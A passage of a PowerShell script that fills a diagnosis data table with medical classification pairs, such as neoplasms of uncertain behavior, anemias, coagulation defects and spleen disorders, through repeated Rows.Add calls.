organs","Neoplasm of uncertain behavior of larynx") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of middle ear and respiratory and intrathoracic organs","Neoplasm of uncertain behavior of trachea, bronchus and lung") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of middle ear and respiratory and intrathoracic organs","Neoplasm of uncertain behavior of pleura") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of middle ear and respiratory and intrathoracic organs","Neoplasm of uncertain behavior of mediastinum") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of middle ear and respiratory and intrathoracic organs","Neoplasm of uncertain behavior of thymus") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of middle ear and respiratory and intrathoracic organs","Neoplasm of uncertain behavior of other respiratory organs") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of middle ear and respiratory and intrathoracic organs","Neoplasm of uncertain behavior of respiratory organ, unspecified") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of female genital organs","Neoplasm of uncertain behavior of uterus") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of ovary","Neoplasm of uncertain behavior of unspecified ovary") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of ovary","Neoplasm of uncertain behavior of right ovary") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of ovary","Neoplasm of uncertain behavior of left ovary") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of placenta","Neoplasm of uncertain behavior of placenta") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of other specified female genital organs","Neoplasm of uncertain behavior of other specified female genital organs") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of female genital organ, unspecified","Neoplasm of uncertain behavior of female genital organ, unspecified") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of male genital organs","Neoplasm of uncertain behavior of prostate") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of testis","Neoplasm of uncertain behavior of unspecified testis") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of testis","Neoplasm of uncertain behavior of right testis") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of testis","Neoplasm of uncertain behavior of left testis") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of other specified male genital organs","Neoplasm of uncertain behavior of other specified male genital organs") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of male genital organ, unspecified","Neoplasm of uncertain behavior of male genital organ, unspecified") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of kidney","Neoplasm of uncertain behavior of unspecified kidney") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of kidney","Neoplasm of uncertain behavior of right kidney") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of kidney","Neoplasm of uncertain behavior of left kidney") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of renal pelvis","Neoplasm of uncertain behavior of unspecified renal pelvis") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of renal pelvis","Neoplasm of uncertain behavior of right renal pelvis") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of renal pelvis","Neoplasm of uncertain behavior of left renal pelvis") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of ureter","Neoplasm of uncertain behavior of unspecified ureter") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of ureter","Neoplasm of uncertain behavior of right ureter") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of ureter","Neoplasm of uncertain behavior of left ureter") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of urethra","Neoplasm of uncertain behavior of urethra") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of bladder","Neoplasm of uncertain behavior of bladder") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of other specified urinary organs","Neoplasm of uncertain behavior of other specified urinary organs") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of unspecified urinary organ","Neoplasm of uncertain behavior of unspecified urinary organ") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of meninges","Neoplasm of uncertain behavior of cerebral meninges") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of meninges","Neoplasm of uncertain behavior of spinal meninges") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of meninges","Neoplasm of uncertain behavior of meninges, unspecified") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of brain and central nervous system","Neoplasm of uncertain behavior of brain, supratentorial") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of brain and central nervous system","Neoplasm of uncertain behavior of brain, infratentorial") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of brain and central nervous system","Neoplasm of uncertain behavior of brain, unspecified") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of brain and central nervous system","Neoplasm of uncertain behavior of cranial nerves") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of brain and central nervous system","Neoplasm of uncertain behavior of spinal cord") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of brain and central nervous system","Neoplasm of uncertain behavior of other specified parts of central nervous system") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of brain and central nervous system","Neoplasm of uncertain behavior of central nervous system, unspecified") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of endocrine glands","Neoplasm of uncertain behavior of thyroid gland") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of adrenal gland","Neoplasm of uncertain behavior of unspecified adrenal gland") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of adrenal gland","Neoplasm of uncertain behavior of right adrenal gland") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of adrenal gland","Neoplasm of uncertain behavior of left adrenal gland") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of parathyroid gland","Neoplasm of uncertain behavior of parathyroid gland") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of pituitary gland","Neoplasm of uncertain behavior of pituitary gland") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of craniopharyngeal duct","Neoplasm of uncertain behavior of craniopharyngeal duct") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of pineal gland","Neoplasm of uncertain behavior of pineal gland") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of carotid body","Neoplasm of uncertain behavior of carotid body") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of aortic body and other paraganglia","Neoplasm of uncertain behavior of aortic body and other paraganglia") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of unspecified endocrine gland","Neoplasm of uncertain behavior of unspecified endocrine gland") + $null = $DiagnosisList.Rows.Add("Polycythemia vera","Polycythemia vera") + $null = $DiagnosisList.Rows.Add("Myelodysplastic syndromes","Refractory anemia without ring sideroblasts, so stated") + $null = $DiagnosisList.Rows.Add("Myelodysplastic syndromes","Refractory anemia with ring sideroblasts") + $null = $DiagnosisList.Rows.Add("Refractory anemia with excess of blasts [RAEB]","Refractory anemia with excess of blasts, unspecified") + $null = $DiagnosisList.Rows.Add("Refractory anemia with excess of blasts [RAEB]","Refractory anemia with excess of blasts 1") + $null = $DiagnosisList.Rows.Add("Refractory anemia with excess of blasts [RAEB]","Refractory anemia with excess of blasts 2") + $null = $DiagnosisList.Rows.Add("Refractory cytopenia with multilineage dysplasia","Refractory cytopenia with multilineage dysplasia") + $null = $DiagnosisList.Rows.Add("Refractory cytopenia with multilineage dysplasia and ring sideroblasts","Refractory cytopenia with multilineage dysplasia and ring sideroblasts") + $null = $DiagnosisList.Rows.Add("Myelodysplastic syndrome with isolated del(5q) chromosomal abnormality","Myelodysplastic syndrome with isolated del(5q) chromosomal abnormality") + $null = $DiagnosisList.Rows.Add("Refractory anemia, unspecified","Refractory anemia, unspecified") + $null = $DiagnosisList.Rows.Add("Other myelodysplastic syndromes","Other myelodysplastic syndromes") + $null = $DiagnosisList.Rows.Add("Myelodysplastic syndrome, unspecified","Myelodysplastic syndrome, unspecified") + $null = $DiagnosisList.Rows.Add("Mast cell neoplasms of uncertain behavior","Cutaneous mastocytosis") + $null = $DiagnosisList.Rows.Add("Mast cell neoplasms of uncertain behavior","Systemic mastocytosis") + $null = $DiagnosisList.Rows.Add("Mast cell neoplasms of uncertain behavior","Other mast cell neoplasms of uncertain behavior") + $null = $DiagnosisList.Rows.Add("Chronic myeloproliferative disease","Chronic myeloproliferative disease") + $null = $DiagnosisList.Rows.Add("Monoclonal gammopathy","Monoclonal gammopathy") + $null = $DiagnosisList.Rows.Add("Essential (hemorrhagic) thrombocythemia","Essential (hemorrhagic) thrombocythemia") + $null = $DiagnosisList.Rows.Add("Osteomyelofibrosis","Osteomyelofibrosis") + $null = $DiagnosisList.Rows.Add("Other specified neoplasms of uncertain behavior of lymphoid, hematopoietic and related tissue","Post-transplant lymphoproliferative disorder (PTLD)") + $null = $DiagnosisList.Rows.Add("Other specified neoplasms of uncertain behavior of lymphoid, hematopoietic and related tissue","Castleman disease") + $null = $DiagnosisList.Rows.Add("Other specified neoplasms of uncertain behavior of lymphoid, hematopoietic and related tissue","Other specified neoplasms of uncertain behavior of lymphoid, hematopoietic and related tissue") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of lymphoid, hematopoietic and related tissue, unspecified","Neoplasm of uncertain behavior of lymphoid, hematopoietic and related tissue, unspecified") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of other and unspecified sites","Neoplasm of uncertain behavior of bone and articular cartilage") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of other and unspecified sites","Neoplasm of uncertain behavior of connective and other soft tissue") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of other and unspecified sites","Neoplasm of uncertain behavior of peripheral nerves and autonomic nervous system") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of other and unspecified sites","Neoplasm of uncertain behavior of retroperitoneum") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of other and unspecified sites","Neoplasm of uncertain behavior of peritoneum") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of other and unspecified sites","Neoplasm of uncertain behavior of skin") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of breast","Neoplasm of uncertain behavior of unspecified breast") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of breast","Neoplasm of uncertain behavior of right breast") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of breast","Neoplasm of uncertain behavior of left breast") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of other specified sites","Neoplasm of uncertain behavior of other specified sites") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior, unspecified","Neoplasm of uncertain behavior, unspecified") + $null = $DiagnosisList.Rows.Add("Neoplasms of unspecified behavior","Neoplasm of unspecified behavior of digestive system") + $null = $DiagnosisList.Rows.Add("Neoplasms of unspecified behavior","Neoplasm of unspecified behavior of respiratory system") + $null = $DiagnosisList.Rows.Add("Neoplasms of unspecified behavior","Neoplasm of unspecified behavior of bone, soft tissue, and skin") + $null = $DiagnosisList.Rows.Add("Neoplasms of unspecified behavior","Neoplasm of unspecified behavior of breast") + $null = $DiagnosisList.Rows.Add("Neoplasms of unspecified behavior","Neoplasm of unspecified behavior of bladder") + $null = $DiagnosisList.Rows.Add("Neoplasm of unspecified behavior of kidney","Neoplasm of unspecified behavior of right kidney") + $null = $DiagnosisList.Rows.Add("Neoplasm of unspecified behavior of kidney","Neoplasm of unspecified behavior of left kidney") + $null = $DiagnosisList.Rows.Add("Neoplasm of unspecified behavior of kidney","Neoplasm of unspecified behavior of unspecified kidney") + $null = $DiagnosisList.Rows.Add("Neoplasm of unspecified behavior of other genitourinary organ","Neoplasm of unspecified behavior of other genitourinary organ") + $null = $DiagnosisList.Rows.Add("Neoplasm of unspecified behavior of brain","Neoplasm of unspecified behavior of brain") + $null = $DiagnosisList.Rows.Add("Neoplasm of unspecified behavior of endocrine glands and other parts of nervous system","Neoplasm of unspecified behavior of endocrine glands and other parts of nervous system") + $null = $DiagnosisList.Rows.Add("Neoplasm of unspecified behavior of other specified sites","Neoplasm of unspecified behavior of retina and choroid") + $null = $DiagnosisList.Rows.Add("Neoplasm of unspecified behavior of other specified sites","Neoplasm of unspecified behavior of other specified sites") + $null = $DiagnosisList.Rows.Add("Neoplasm of unspecified behavior of unspecified site","Neoplasm of unspecified behavior of unspecified site") + $null = $DiagnosisList.Rows.Add("Iron deficiency anemia","Iron deficiency anemia secondary to blood loss (chronic)") + $null = $DiagnosisList.Rows.Add("Iron deficiency anemia","Sideropenic dysphagia") + $null = $DiagnosisList.Rows.Add("Iron deficiency anemia","Other iron deficiency anemias") + $null = $DiagnosisList.Rows.Add("Iron deficiency anemia","Iron deficiency anemia, unspecified") + $null = $DiagnosisList.Rows.Add("Vitamin B12 deficiency anemia","Vitamin B12 deficiency anemia due to intrinsic factor deficiency") + $null = $DiagnosisList.Rows.Add("Vitamin B12 deficiency anemia","Vitamin B12 deficiency anemia due to selective vitamin B12 malabsorption with proteinuria") + $null = $DiagnosisList.Rows.Add("Vitamin B12 deficiency anemia","Transcobalamin II deficiency") + $null = $DiagnosisList.Rows.Add("Vitamin B12 deficiency anemia","Other dietary vitamin B12 deficiency anemia") + $null = $DiagnosisList.Rows.Add("Vitamin B12 deficiency anemia","Other vitamin B12 deficiency anemias") + $null = $DiagnosisList.Rows.Add("Vitamin B12 deficiency anemia","Vitamin B12 deficiency anemia, unspecified") + $null = $DiagnosisList.Rows.Add("Folate deficiency anemia","Dietary folate deficiency anemia") + $null = $DiagnosisList.Rows.Add("Folate deficiency anemia","Drug-induced folate deficiency anemia") + $null = $DiagnosisList.Rows.Add("Folate deficiency anemia","Other folate deficiency anemias") + $null = $DiagnosisList.Rows.Add("Folate deficiency anemia","Folate deficiency anemia, unspecified") + $null = $DiagnosisList.Rows.Add("Other nutritional anemias","Protein deficiency anemia") + $null = $DiagnosisList.Rows.Add("Other nutritional anemias","Other megaloblastic anemias, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other nutritional anemias","Scorbutic anemia") + $null = $DiagnosisList.Rows.Add("Other nutritional anemias","Other specified nutritional anemias") + $null = $DiagnosisList.Rows.Add("Other nutritional anemias","Nutritional anemia, unspecified") + $null = $DiagnosisList.Rows.Add("Anemia due to enzyme disorders","Anemia due to glucose-6-phosphate dehydrogenase [G6PD] deficiency") + $null = $DiagnosisList.Rows.Add("Anemia due to enzyme disorders","Anemia due to other disorders of glutathione metabolism") + $null = $DiagnosisList.Rows.Add("Anemia due to enzyme disorders","Anemia due to disorders of glycolytic enzymes") + $null = $DiagnosisList.Rows.Add("Anemia due to enzyme disorders","Anemia due to disorders of nucleotide metabolism") + $null = $DiagnosisList.Rows.Add("Anemia due to enzyme disorders","Other anemias due to enzyme disorders") + $null = $DiagnosisList.Rows.Add("Anemia due to enzyme disorders","Anemia due to enzyme disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Thalassemia","Alpha thalassemia") + $null = $DiagnosisList.Rows.Add("Thalassemia","Beta thalassemia") + $null = $DiagnosisList.Rows.Add("Thalassemia","Delta-beta thalassemia") + $null = $DiagnosisList.Rows.Add("Thalassemia","Thalassemia minor") + $null = $DiagnosisList.Rows.Add("Thalassemia","Hereditary persistence of fetal hemoglobin [HPFH]") + $null = $DiagnosisList.Rows.Add("Thalassemia","Hemoglobin E-beta thalassemia") + $null = $DiagnosisList.Rows.Add("Thalassemia","Other thalassemias") + $null = $DiagnosisList.Rows.Add("Thalassemia","Thalassemia, unspecified") + $null = $DiagnosisList.Rows.Add("Hb-SS disease with crisis","Hb-SS disease with crisis, unspecified") + $null = $DiagnosisList.Rows.Add("Hb-SS disease with crisis","Hb-SS disease with acute chest syndrome") + $null = $DiagnosisList.Rows.Add("Hb-SS disease with crisis","Hb-SS disease with splenic sequestration") + $null = $DiagnosisList.Rows.Add("Sickle-cell disease without crisis","Sickle-cell disease without crisis") + $null = $DiagnosisList.Rows.Add("Sickle-cell/Hb-C disease","Sickle-cell/Hb-C disease without crisis") + $null = $DiagnosisList.Rows.Add("Sickle-cell/Hb-C disease with crisis","Sickle-cell/Hb-C disease with acute chest syndrome") + $null = $DiagnosisList.Rows.Add("Sickle-cell/Hb-C disease with crisis","Sickle-cell/Hb-C disease with splenic sequestration") + $null = $DiagnosisList.Rows.Add("Sickle-cell/Hb-C disease with crisis","Sickle-cell/Hb-C disease with crisis, unspecified") + $null = $DiagnosisList.Rows.Add("Sickle-cell trait","Sickle-cell trait") + $null = $DiagnosisList.Rows.Add("Sickle-cell thalassemia","Sickle-cell thalassemia without crisis") + $null = $DiagnosisList.Rows.Add("Sickle-cell thalassemia with crisis","Sickle-cell thalassemia with acute chest syndrome") + $null = $DiagnosisList.Rows.Add("Sickle-cell thalassemia with crisis","Sickle-cell thalassemia with splenic sequestration") + $null = $DiagnosisList.Rows.Add("Sickle-cell thalassemia with crisis","Sickle-cell thalassemia with crisis, unspecified") + $null = $DiagnosisList.Rows.Add("Other sickle-cell disorders","Other sickle-cell disorders without crisis") + $null = $DiagnosisList.Rows.Add("Other sickle-cell disorders with crisis","Other sickle-cell disorders with acute chest syndrome") + $null = $DiagnosisList.Rows.Add("Other sickle-cell disorders with crisis","Other sickle-cell disorders with splenic sequestration") + $null = $DiagnosisList.Rows.Add("Other sickle-cell disorders with crisis","Other sickle-cell disorders with crisis, unspecified") + $null = $DiagnosisList.Rows.Add("Other hereditary hemolytic anemias","Hereditary spherocytosis") + $null = $DiagnosisList.Rows.Add("Other hereditary hemolytic anemias","Hereditary elliptocytosis") + $null = $DiagnosisList.Rows.Add("Other hereditary hemolytic anemias","Other hemoglobinopathies") + $null = $DiagnosisList.Rows.Add("Other hereditary hemolytic anemias","Other specified hereditary hemolytic anemias") + $null = $DiagnosisList.Rows.Add("Other hereditary hemolytic anemias","Hereditary hemolytic anemia, unspecified") + $null = $DiagnosisList.Rows.Add("Acquired hemolytic anemia","Drug-induced autoimmune hemolytic anemia") + $null = $DiagnosisList.Rows.Add("Acquired hemolytic anemia","Other autoimmune hemolytic anemias") + $null = $DiagnosisList.Rows.Add("Acquired hemolytic anemia","Drug-induced nonautoimmune hemolytic anemia") + $null = $DiagnosisList.Rows.Add("Acquired hemolytic anemia","Hemolytic-uremic syndrome") + $null = $DiagnosisList.Rows.Add("Acquired hemolytic anemia","Other nonautoimmune hemolytic anemias") + $null = $DiagnosisList.Rows.Add("Acquired hemolytic anemia","Paroxysmal nocturnal hemoglobinuria [Marchiafava-Micheli]") + $null = $DiagnosisList.Rows.Add("Acquired hemolytic anemia","Hemoglobinuria due to hemolysis from other external causes") + $null = $DiagnosisList.Rows.Add("Acquired hemolytic anemia","Other acquired hemolytic anemias") + $null = $DiagnosisList.Rows.Add("Acquired hemolytic anemia","Acquired hemolytic anemia, unspecified") + $null = $DiagnosisList.Rows.Add("Acquired pure red cell aplasia [erythroblastopenia]","Chronic acquired pure red cell aplasia") + $null = $DiagnosisList.Rows.Add("Acquired pure red cell aplasia [erythroblastopenia]","Transient acquired pure red cell aplasia") + $null = $DiagnosisList.Rows.Add("Acquired pure red cell aplasia [erythroblastopenia]","Other acquired pure red cell aplasias") + $null = $DiagnosisList.Rows.Add("Acquired pure red cell aplasia [erythroblastopenia]","Acquired pure red cell aplasia, unspecified") + $null = $DiagnosisList.Rows.Add("Constitutional aplastic anemia","Constitutional (pure) red blood cell aplasia") + $null = $DiagnosisList.Rows.Add("Constitutional aplastic anemia","Other constitutional aplastic anemia") + $null = $DiagnosisList.Rows.Add("Drug-induced aplastic anemia","Drug-induced aplastic anemia") + $null = $DiagnosisList.Rows.Add("Aplastic anemia due to other external agents","Aplastic anemia due to other external agents") + $null = $DiagnosisList.Rows.Add("Idiopathic aplastic anemia","Idiopathic aplastic anemia") + $null = $DiagnosisList.Rows.Add("Pancytopenia","Antineoplastic chemotherapy induced pancytopenia") + $null = $DiagnosisList.Rows.Add("Pancytopenia","Other drug-induced pancytopenia") + $null = $DiagnosisList.Rows.Add("Pancytopenia","Other pancytopenia") + $null = $DiagnosisList.Rows.Add("Myelophthisis","Myelophthisis") + $null = $DiagnosisList.Rows.Add("Other specified aplastic anemias and other bone marrow failure syndromes","Other specified aplastic anemias and other bone marrow failure syndromes") + $null = $DiagnosisList.Rows.Add("Aplastic anemia, unspecified","Aplastic anemia, unspecified") + $null = $DiagnosisList.Rows.Add("Acute posthemorrhagic anemia","Acute posthemorrhagic anemia") + $null = $DiagnosisList.Rows.Add("Anemia in chronic diseases classified elsewhere","Anemia in neoplastic disease") + $null = $DiagnosisList.Rows.Add("Anemia in chronic diseases classified elsewhere","Anemia in chronic kidney disease") + $null = $DiagnosisList.Rows.Add("Anemia in chronic diseases classified elsewhere","Anemia in other chronic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other anemias","Hereditary sideroblastic anemia") + $null = $DiagnosisList.Rows.Add("Other anemias","Secondary sideroblastic anemia due to disease") + $null = $DiagnosisList.Rows.Add("Other anemias","Secondary sideroblastic anemia due to drugs and toxins") + $null = $DiagnosisList.Rows.Add("Other anemias","Other sideroblastic anemias") + $null = $DiagnosisList.Rows.Add("Other anemias","Congenital dyserythropoietic anemia") + $null = $DiagnosisList.Rows.Add("Other specified anemias","Anemia due to antineoplastic chemotherapy") + $null = $DiagnosisList.Rows.Add("Other specified anemias","Other specified anemias") + $null = $DiagnosisList.Rows.Add("Anemia, unspecified","Anemia, unspecified") + $null = $DiagnosisList.Rows.Add("Disseminated intravascular coagulation [defibrination syndrome]","Disseminated intravascular coagulation [defibrination syndrome]") + $null = $DiagnosisList.Rows.Add("Hereditary factor VIII deficiency","Hereditary factor VIII deficiency") + $null = $DiagnosisList.Rows.Add("Hereditary factor IX deficiency","Hereditary factor IX deficiency") + $null = $DiagnosisList.Rows.Add("Other coagulation defects","Von Willebrand's disease") + $null = $DiagnosisList.Rows.Add("Other coagulation defects","Hereditary factor XI deficiency") + $null = $DiagnosisList.Rows.Add("Other coagulation defects","Hereditary deficiency of other clotting factors") + $null = $DiagnosisList.Rows.Add("Hemorrhagic disorder due to intrinsic circulating anticoagulants, antibodies, or inhibitors","Acquired hemophilia") + $null = $DiagnosisList.Rows.Add("Hemorrhagic disorder due to intrinsic circulating anticoagulants, antibodies, or inhibitors","Antiphospholipid antibody with hemorrhagic disorder") + $null = $DiagnosisList.Rows.Add("Hemorrhagic disorder due to intrinsic circulating anticoagulants, antibodies, or inhibitors","Other hemorrhagic disorder due to intrinsic circulating anticoagulants, antibodies, or inhibitors") + $null = $DiagnosisList.Rows.Add("Hemorrhagic disorder due to extrinsic circulating anticoagulants","Hemorrhagic disorder due to extrinsic circulating anticoagulants") + $null = $DiagnosisList.Rows.Add("Acquired coagulation factor deficiency","Acquired coagulation factor deficiency") + $null = $DiagnosisList.Rows.Add("Primary thrombophilia","Activated protein C resistance") + $null = $DiagnosisList.Rows.Add("Primary thrombophilia","Prothrombin gene mutation") + $null = $DiagnosisList.Rows.Add("Primary thrombophilia","Other primary thrombophilia") + $null = $DiagnosisList.Rows.Add("Other thrombophilia","Antiphospholipid syndrome") + $null = $DiagnosisList.Rows.Add("Other thrombophilia","Lupus anticoagulant syndrome") + $null = $DiagnosisList.Rows.Add("Other thrombophilia","Other thrombophilia") + $null = $DiagnosisList.Rows.Add("Other specified coagulation defects","Other specified coagulation defects") + $null = $DiagnosisList.Rows.Add("Coagulation defect, unspecified","Coagulation defect, unspecified") + $null = $DiagnosisList.Rows.Add("Purpura and other hemorrhagic conditions","Allergic purpura") + $null = $DiagnosisList.Rows.Add("Purpura and other hemorrhagic conditions","Qualitative platelet defects") + $null = $DiagnosisList.Rows.Add("Purpura and other hemorrhagic conditions","Other nonthrombocytopenic purpura") + $null = $DiagnosisList.Rows.Add("Purpura and other hemorrhagic conditions","Immune thrombocytopenic purpura") + $null = $DiagnosisList.Rows.Add("Other primary thrombocytopenia","Evans syndrome") + $null = $DiagnosisList.Rows.Add("Other primary thrombocytopenia","Congenital and hereditary thrombocytopenia purpura") + $null = $DiagnosisList.Rows.Add("Other primary thrombocytopenia","Other primary thrombocytopenia") + $null = $DiagnosisList.Rows.Add("Secondary thrombocytopenia","Posttransfusion purpura") + $null = $DiagnosisList.Rows.Add("Secondary thrombocytopenia","Other secondary thrombocytopenia") + $null = $DiagnosisList.Rows.Add("Thrombocytopenia, unspecified","Thrombocytopenia, unspecified") + $null = $DiagnosisList.Rows.Add("Other specified hemorrhagic conditions","Other specified hemorrhagic conditions") + $null = $DiagnosisList.Rows.Add("Hemorrhagic condition, unspecified","Hemorrhagic condition, unspecified") + $null = $DiagnosisList.Rows.Add("Neutropenia","Congenital agranulocytosis") + $null = $DiagnosisList.Rows.Add("Neutropenia","Agranulocytosis secondary to cancer chemotherapy") + $null = $DiagnosisList.Rows.Add("Neutropenia","Other drug-induced agranulocytosis") + $null = $DiagnosisList.Rows.Add("Neutropenia","Neutropenia due to infection") + $null = $DiagnosisList.Rows.Add("Neutropenia","Cyclic neutropenia") + $null = $DiagnosisList.Rows.Add("Neutropenia","Other neutropenia") + $null = $DiagnosisList.Rows.Add("Neutropenia","Neutropenia, unspecified") + $null = $DiagnosisList.Rows.Add("Functional disorders of polymorphonuclear neutrophils","Functional disorders of polymorphonuclear neutrophils") + $null = $DiagnosisList.Rows.Add("Other disorders of white blood cells","Genetic anomalies of leukocytes") + $null = $DiagnosisList.Rows.Add("Other disorders of white blood cells","Eosinophilia") + $null = $DiagnosisList.Rows.Add("Decreased white blood cell count","Lymphocytopenia") + $null = $DiagnosisList.Rows.Add("Decreased white blood cell count","Other decreased white blood cell count") + $null = $DiagnosisList.Rows.Add("Decreased white blood cell count","Decreased white blood cell count, unspecified") + $null = $DiagnosisList.Rows.Add("Elevated white blood cell count","Lymphocytosis (symptomatic)") + $null = $DiagnosisList.Rows.Add("Elevated white blood cell count","Monocytosis (symptomatic)") + $null = $DiagnosisList.Rows.Add("Elevated white blood cell count","Plasmacytosis") + $null = $DiagnosisList.Rows.Add("Elevated white blood cell count","Leukemoid reaction") + $null = $DiagnosisList.Rows.Add("Elevated white blood cell count","Basophilia") + $null = $DiagnosisList.Rows.Add("Elevated white blood cell count","Bandemia") + $null = $DiagnosisList.Rows.Add("Elevated white blood cell count","Other elevated white blood cell count") + $null = $DiagnosisList.Rows.Add("Elevated white blood cell count","Elevated white blood cell count, unspecified") + $null = $DiagnosisList.Rows.Add("Other specified disorders of white blood cells","Other specified disorders of white blood cells") + $null = $DiagnosisList.Rows.Add("Disorder of white blood cells, unspecified","Disorder of white blood cells, unspecified") + $null = $DiagnosisList.Rows.Add("Diseases of spleen","Hyposplenism") + $null = $DiagnosisList.Rows.Add("Diseases of spleen","Hypersplenism") + $null = $DiagnosisList.Rows.Add("Diseases of spleen","Chronic congestive splenomegaly") + $null = $DiagnosisList.Rows.Add("Diseases of spleen","Abscess of spleen") + $null = $DiagnosisList.Rows.Add("Diseases of spleen","Cyst of spleen") + $null = $DiagnosisList.Rows.Add("Diseases of spleen","Infarction of spleen") + $null = $DiagnosisList.Rows.Add("Other diseases of spleen","Neutropenic splenomegaly") + $null = $DiagnosisList.Rows.Add("Other diseases of spleen","Other diseases of spleen") + $null = $DiagnosisList.Rows.Add("Disease of spleen, unspecified","Disease of spleen, unspecified") + $null = $DiagnosisList.Rows.Add("Methemoglobinemia","Congenital methemoglobinemia") + $null = $DiagnosisList.Rows.Add("Methemoglobinemia","Other methemoglobinemias") + $null = $DiagnosisList.Rows.Add("Methemoglobinemia","Methemoglobinemia, unspecified") + $null = $DiagnosisList.Rows.Add("Other and unspecified diseases of blood and blood-forming organs","Familial erythrocytosis") + $null = $DiagnosisList.Rows.Add("Other and unspecified diseases of blood and blood-forming organs","Secondary polycythemia") + $null = $DiagnosisList.Rows.Add("Other specified diseases of blood and blood-forming organs","Myelofibrosis") + $null = $DiagnosisList.Rows.Add("Other specified diseases of blood and blood-forming organs","Heparin induced thrombocytopenia (HIT)") + $null = $DiagnosisList.Rows.Add("Other specified diseases of blood and blood-forming organs","Other specified diseases of blood and blood-forming organs") + $null = $DiagnosisList.Rows.Add("Disease of blood and blood-forming organs, unspecified","Disease of blood and blood-forming organs, unspecified") + $null = $DiagnosisList.Rows.Add("Other specified diseases with participation of lymphoreticular and reticulohistiocytic tissue","Hemophagocytic lymphohistiocytosis") + $null = $DiagnosisList.Rows.Add("Other specified diseases with participation of lymphoreticular and reticulohistiocytic tissue","Hemophagocytic syndrome, infection-associated") + $null = $DiagnosisList.Rows.Add("Other specified diseases with participation of lymphoreticular and reticulohistiocytic tissue","Other histiocytosis syndromes") + $null = $DiagnosisList.Rows.Add("Other disorders of blood and blood-forming organs in diseases classified elsewhere","Other disorders of blood and blood-forming organs in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of the spleen complicating a procedure","Intraoperative hemorrhage and hematoma of the spleen complicating a procedure on the spleen") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of the spleen complicating a procedure","Intraoperative hemorrhage and hematoma of the spleen complicating other procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of the spleen during a procedure","Accidental puncture and laceration of the spleen during a procedure on the spleen") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of the spleen during a procedure","Accidental puncture and laceration of the spleen during other procedure") + $null = 